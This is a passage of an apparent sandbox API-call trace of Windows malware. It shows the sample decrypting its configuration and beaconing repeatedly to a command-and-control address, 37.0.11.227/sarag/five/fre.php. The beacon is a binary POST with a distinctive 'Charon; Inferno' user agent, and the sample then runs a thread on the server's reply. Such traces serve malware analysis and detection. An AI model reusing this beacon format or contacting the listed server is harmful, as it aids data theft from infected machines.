ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0239.162] GetProcessHeap () returned 0x690000 [0239.163] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0239.163] GetProcessHeap () returned 0x690000 [0239.163] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0239.163] GetProcessHeap () returned 0x690000 [0239.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0239.164] GetProcessHeap () returned 0x690000 [0239.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0239.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.164] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.169] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0239.175] GetProcessHeap () returned 0x690000 [0239.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0239.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.176] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0239.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.177] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.178] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.178] GetProcessHeap () returned 0x690000 [0239.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0239.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.195] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0239.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.197] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0239.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.199] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0239.200] GetProcessHeap () returned 0x690000 [0239.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0239.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.201] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0239.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.202] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0239.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.203] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0239.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.204] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0239.204] GetProcessHeap () returned 0x690000 [0239.204] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0239.204] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0239.204] GetProcessHeap () returned 0x690000 [0239.204] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0239.204] socket (af=2, type=1, protocol=6) returned 0x63c [0239.204] connect (s=0x63c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0239.235] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0239.235] GetProcessHeap () returned 0x690000 [0239.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0239.235] GetProcessHeap () returned 0x690000 [0239.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0239.235] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0239.236] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0239.236] GetProcessHeap () returned 0x690000 [0239.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0239.236] GetProcessHeap () returned 0x690000 [0239.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0239.237] GetProcessHeap () returned 0x690000 [0239.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0239.237] GetProcessHeap () returned 0x690000 [0239.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0239.238] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0239.238] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0239.238] GetProcessHeap () returned 0x690000 [0239.238] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0239.239] GetProcessHeap () returned 0x690000 [0239.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0239.239] send (s=0x63c, buf=0x6ad508*, len=242, flags=0) returned 242 [0239.242] send (s=0x63c, buf=0x6aba40*, len=159, flags=0) returned 159 [0239.242] GetProcessHeap () returned 0x690000 [0239.242] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0239.242] recv (in: s=0x63c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0239.331] GetProcessHeap () returned 0x690000 [0239.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0239.332] GetProcessHeap () returned 0x690000 [0239.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0239.332] GetProcessHeap () returned 0x690000 [0239.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0239.333] GetProcessHeap () returned 0x690000 [0239.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0239.333] closesocket (s=0x63c) returned 0 [0239.333] GetProcessHeap () returned 0x690000 [0239.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0239.333] GetProcessHeap () returned 0x690000 [0239.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0239.334] GetProcessHeap () returned 0x690000 [0239.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0239.334] GetProcessHeap () returned 0x690000 [0239.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0239.335] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf4c) returned 0x63c [0239.344] Sleep (dwMilliseconds=0xea60) [0239.345] GetProcessHeap () returned 0x690000 [0239.345] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0239.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.346] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.354] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0239.361] GetProcessHeap () returned 0x690000 [0239.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0239.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.362] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0239.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.365] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.366] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.366] GetProcessHeap () returned 0x690000 [0239.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0239.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.367] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0239.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.371] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0239.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.372] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0239.372] GetProcessHeap () returned 0x690000 [0239.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0239.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.375] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0239.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.376] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0239.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.377] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0239.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.378] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0239.378] GetProcessHeap () returned 0x690000 [0239.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0239.378] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0239.378] GetProcessHeap () returned 0x690000 [0239.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0239.379] GetProcessHeap () returned 0x690000 [0239.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0239.379] GetProcessHeap () returned 0x690000 [0239.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0239.380] GetProcessHeap () returned 0x690000 [0239.380] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0239.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.381] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.389] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0239.396] GetProcessHeap () returned 0x690000 [0239.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0239.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.397] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0239.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.398] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.399] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.399] GetProcessHeap () returned 0x690000 [0239.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0239.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.401] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0239.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.402] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0239.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.403] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0239.404] GetProcessHeap () returned 0x690000 [0239.404] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0239.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.405] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0239.405] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.406] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0239.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.409] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0239.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.410] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0239.410] GetProcessHeap () returned 0x690000 [0239.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0239.410] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0239.410] GetProcessHeap () returned 0x690000 [0239.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0239.410] socket (af=2, type=1, protocol=6) returned 0x640 [0239.410] connect (s=0x640, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0239.437] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0239.437] GetProcessHeap () returned 0x690000 [0239.437] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0239.437] GetProcessHeap () returned 0x690000 [0239.437] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0239.438] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0239.511] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0239.511] GetProcessHeap () returned 0x690000 [0239.511] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0239.511] GetProcessHeap () returned 0x690000 [0239.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0239.512] GetProcessHeap () returned 0x690000 [0239.512] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0239.512] GetProcessHeap () returned 0x690000 [0239.512] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0239.513] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0239.514] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0239.514] GetProcessHeap () returned 0x690000 [0239.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0239.514] GetProcessHeap () returned 0x690000 [0239.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0239.514] send (s=0x640, buf=0x6ad508*, len=242, flags=0) returned 242 [0239.515] send (s=0x640, buf=0x6aba40*, len=159, flags=0) returned 159 [0239.516] GetProcessHeap () returned 0x690000 [0239.516] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0239.516] recv (in: s=0x640, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0239.588] GetProcessHeap () returned 0x690000 [0239.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0239.589] GetProcessHeap () returned 0x690000 [0239.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0239.590] GetProcessHeap () returned 0x690000 [0239.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0239.590] GetProcessHeap () returned 0x690000 [0239.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0239.591] closesocket (s=0x640) returned 0 [0239.592] GetProcessHeap () returned 0x690000 [0239.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0239.592] GetProcessHeap () returned 0x690000 [0239.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0239.593] GetProcessHeap () returned 0x690000 [0239.593] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0239.593] GetProcessHeap () returned 0x690000 [0239.593] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0239.594] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa00) returned 0x640 [0239.596] Sleep (dwMilliseconds=0xea60) [0239.598] GetProcessHeap () returned 0x690000 [0239.598] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0239.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.599] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.608] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0239.616] GetProcessHeap () returned 0x690000 [0239.616] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0239.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.617] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0239.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.618] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.619] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.619] GetProcessHeap () returned 0x690000 [0239.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0239.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.621] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0239.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.629] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0239.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.630] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0239.630] GetProcessHeap () returned 0x690000 [0239.630] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0239.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.631] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0239.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.631] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0239.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.632] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0239.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.633] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0239.633] GetProcessHeap () returned 0x690000 [0239.633] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0239.633] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0239.634] GetProcessHeap () returned 0x690000 [0239.634] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0239.634] GetProcessHeap () returned 0x690000 [0239.634] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0239.634] GetProcessHeap () returned 0x690000 [0239.635] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0239.635] GetProcessHeap () returned 0x690000 [0239.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0239.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.636] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.642] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0239.648] GetProcessHeap () returned 0x690000 [0239.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0239.648] LoadLibraryW 